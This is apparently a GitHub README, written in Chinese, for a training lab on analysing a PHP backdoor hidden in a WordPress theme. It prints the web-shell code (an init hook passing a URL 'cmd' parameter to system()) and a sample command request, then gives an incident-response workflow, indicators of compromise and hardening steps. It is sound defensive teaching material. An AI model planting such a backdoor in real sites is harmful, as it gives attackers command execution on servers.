Hunter-Motiur/wordpress-backdoor-analysis-lab

GitHub: Hunter-Motiur/wordpress-backdoor-analysis-lab

一个用于练习 WordPress PHP 后门分析与事件响应流程的实操培训实验室。

Stars: 0 | Forks: 0

# WordPress 后门分析实验室 ## 概述 本仓库记录了一次模拟的 WordPress 恶意软件调查,重点在于识别和分析隐藏在 WordPress 主题中的 PHP 后门。 这是一个旨在提高恶意软件分析和事件响应技能的实操培训实验室。 # 实验室信息 **类型:** 恶意软件分析实验室 **难度:** 中级 **平台:** WordPress **语言:** PHP # 场景 在一次恶意软件调查中,在以下位置发现了可疑的 PHP 代码: ``` wp-content/themes/twentytwentyfour/functions.php ``` 代码如下所示: ``` add_action('init', function () { if(isset($_GET['cmd'])){ system($_GET['cmd']); } }); ``` # 初步评估 该代码似乎是一个 PHP 后门,因为它直接通过用户控制的 URL 参数执行操作系统命令。 这种行为不属于正常的 WordPress 功能。 # 技术分析 ## 文件位置 ``` wp-content/themes/twentytwentyfour/functions.php ``` ## 可疑函数 ``` system() ``` 用途: 在服务器上执行操作系统命令。 ## Hook ``` add_action('init') ``` 用途: 在 WordPress 每次初始化时运行。 ## 用户输入 ``` $_GET['cmd'] ``` 用途: 直接从 URL 接收命令输入。 # 可能的攻击 示例: ``` https://example.com/?cmd=id ``` 攻击者的潜在能力: - 执行系统命令 - 读取敏感文件 - 删除文件 - 上传额外的恶意软件 - 下载网站数据 - 创建持久性 - 篡改网页 # 调查工作流 1. 保留原始文件。 2. 创建取证副本。 3. 审查可疑的 PHP 函数。 4. 与干净的主题进行对比。 5. 搜索额外的后门。 6. 审查 Web 服务器日志。 7. 识别入侵指标 (IOC)。 8. 移除恶意代码。 9. 验证清理是否成功。 10. 执行安全加固。 # 入侵指标 - 出乎意料的 system() 使用 - 可疑的 init hook 使用 - 用户控制的命令执行 - 被修改的 functions.php # 安全加固 - 更新 WordPress 核心 - 更新插件 - 更新主题 - 移除未使用的插件 - 重置密码 - 检查文件权限 - 安装安全插件 - 禁用文件编辑 # 展示的技能 - WordPress 恶意软件分析 - PHP 代码审查 - 事件响应 - IOC 识别 - 人工恶意软件检测 - 安全加固 # 经验教训 - 永远不要信任用户输入。 - 在清理前保留证据。 - 人工验证是必不可少的。 - 务必调查根本原因。 - 搜索其他的持久化机制。 # 状态 已完成 实验室模拟
标签:DAST, OpenVAS, PHP, WebShell分析, WordPress, 安全实验, 库, 应急响应, 恶意软件分析, 搜索语句(dork), 文件完整性监控